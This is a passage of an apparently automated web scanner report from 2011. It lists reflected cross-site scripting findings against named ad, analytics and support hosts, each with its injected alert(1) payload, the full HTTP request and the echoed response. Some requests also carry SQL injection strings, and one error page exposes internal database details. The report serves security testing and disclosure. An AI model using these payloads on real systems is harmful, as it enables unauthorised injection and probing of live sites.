try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16edfaf<script>alert(1)</script>b066ab31bd7", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});
5.30. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 4a196<script>alert(1)</script>3f29ade7707 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=123174a196<script>alert(1)</script>3f29ade7707&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:20 GMT
Date: Sat, 07 May 2011 22:38:20 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"123174a196<script>alert(1)</script>3f29ade7707", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.31. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ff2cf<script>alert(1)</script>e9478be8b5 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856ff2cf<script>alert(1)</script>e9478be8b5&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:22 GMT
Date: Sat, 07 May 2011 22:38:22 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856ff2cf<script>alert(1)</script>e9478be8b5", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.32. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 69f13<script>alert(1)</script>679de6de390 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=69f13<script>alert(1)</script>679de6de390&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:25 GMT
Date: Sat, 07 May 2011 22:38:25 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"69f13<script>alert(1)</script>679de6de390", c10:"197334", c15:"", c16:"", r:""});



5.33. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload b9c48<script>alert(1)</script>86ae8ab1018 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_60546910506b9c48<script>alert(1)</script>86ae8ab1018&pid=6a06418f-3099-5e06-6480-4371ef1e2544&s=728x90&f=0.49&cid=hhh728&url=http%3A%2F%2Fads.adonion.com%2Fserving%2Fshowbanner.php%3Fzone_id%3D45274%26user_id%3D17557%26site_id%3D15418%26size_id%3D1%26type_id%3D2%26flag%3D12%26b1%3D%25239cbce8%26b2%3D%2523000000%26b3%3D%2523FFFFFF%26b4%3D%2523000000%26ref%3Dhttp%253A%252F%252Fwww.kroogy.com%252Fsearch%252Famazon%253Fsearch%253Dmp3%2526type%253DAmazon%2526fl%253D0%26token%3DZGs2zNQg0yIgLSzR0fklWi0pMM7PIdh8fSoqz88i03z5alom3iXQfQ%26random%3D4474 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://creative.adonion.com/2_4092.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304557115

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=6f4ce7c4-85c4-4c44-be2c-721147673161; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304805367; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_60546910506b9c48<script>alert(1)</script>86ae8ab1018({"r":null});

5.34. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The value of the CompanyName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21525"><a>48f3eb756f8 was submitted in the CompanyName parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=21525"><a>48f3eb756f8&Question= HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: http://www.gotoassist.com/ph/lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dtsSession=SessionInfo%3D237919369%253A7FA06EBD517AE37; path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
<input type=text size=18 style="font: normal 10 verdana,arial,helvetica;width:156;height:17;" name="CompanyName" value="21525"><a>48f3eb756f8">
...[SNIP]...

5.35. http://dce.sapha.com/engine.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 8870a<script>alert(1)</script>5c8aaf5ef92 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%201--8870a<script>alert(1)</script>5c8aaf5ef92 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 494

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT 1--8870a<script>alert(1)</script>5c8aaf5ef92'<br>
...[SNIP]...

5.36. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload acfaf<script>alert(1)</script>dffcf9b8718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801-- HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 502

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801--'<br>
...[SNIP]...

5.37. http://depot.activalive.com/app/deployment.php [d[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload 9e6c5<script>alert(1)</script>2ac58b1cb32 was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=5930&ptid=5930-13937bf0e-a621-46f8-934f-34f158f4a901&stid=13937bf0e-a621-46f8-934f-34f158f4a901&oref=Direct&chat=null&r=0.5038613956421614&d[]=52219e6c5<script>alert(1)</script>2ac58b1cb32&b[]=14187 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 550
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5221);
_alc.__setStartDeptStatus(52219e6c5<script>alert(1)</script>2ac58b1cb32, false);
_alc.__setStartDeptStatus(5221, true);
delete _alc.__setStartDeptStatus;
_alc.setup(10596, 5930);
_alc.handleInvite = _alc.rollDownInvite;
_alc.handleInviteRejection = _alc.rollBackInvite;
_a
...[SNIP]...

5.38. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79937<script>alert(1)</script>4b3b2809a1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&79937<script>alert(1)</script>4b3b2809a1c=1 HTTP/1.1
Host: dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:11 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 79937<script>alert(1)</script>4b3b2809a1c

5.39. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/advancedaccess

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ce1e<script>alert(1)</script>41bc3fc6507 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http%3A//www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=pNpFk6ofuQKf

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:14 GMT
Content-Length: 545

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http://www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf
</pre>
...[SNIP]...

5.40. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce53d<script>alert(1)</script>bdd2d651cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:39:59 GMT
Content-Length: 574

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- =====================
...[SNIP]...

5.41. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f0a6<a>a8f8fbe4fcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:01 GMT
Content-Length: 552

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- ===========================================
...[SNIP]...

5.42. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edc80'%3balert(1)//d5cd4bf1dc7 was submitted in the mpck parameter. This input was echoed as edc80';alert(1)//d5cd4bf1dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014edc80'%3balert(1)//d5cd4bf1dc7&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:18 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4867
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
href="http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-68?pid=67732&bid=2606&mpt=572011105140PM4014edc80';alert(1)//d5cd4bf1dc7" target="_blank">
...[SNIP]...

5.43. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dd6"-alert(1)-"2b8a1c2260d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7dd6"-alert(1)-"2b8a1c2260d&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:16 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4861
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7dd6"-alert(1)-"2b8a1c2260d");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7d
...[SNIP]...

5.44. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fccc'%3balert(1)//880f559a92c was submitted in the mpvc parameter. This input was echoed as 1fccc';alert(1)//880f559a92c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=1fccc'%3balert(1)//880f559a92c HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
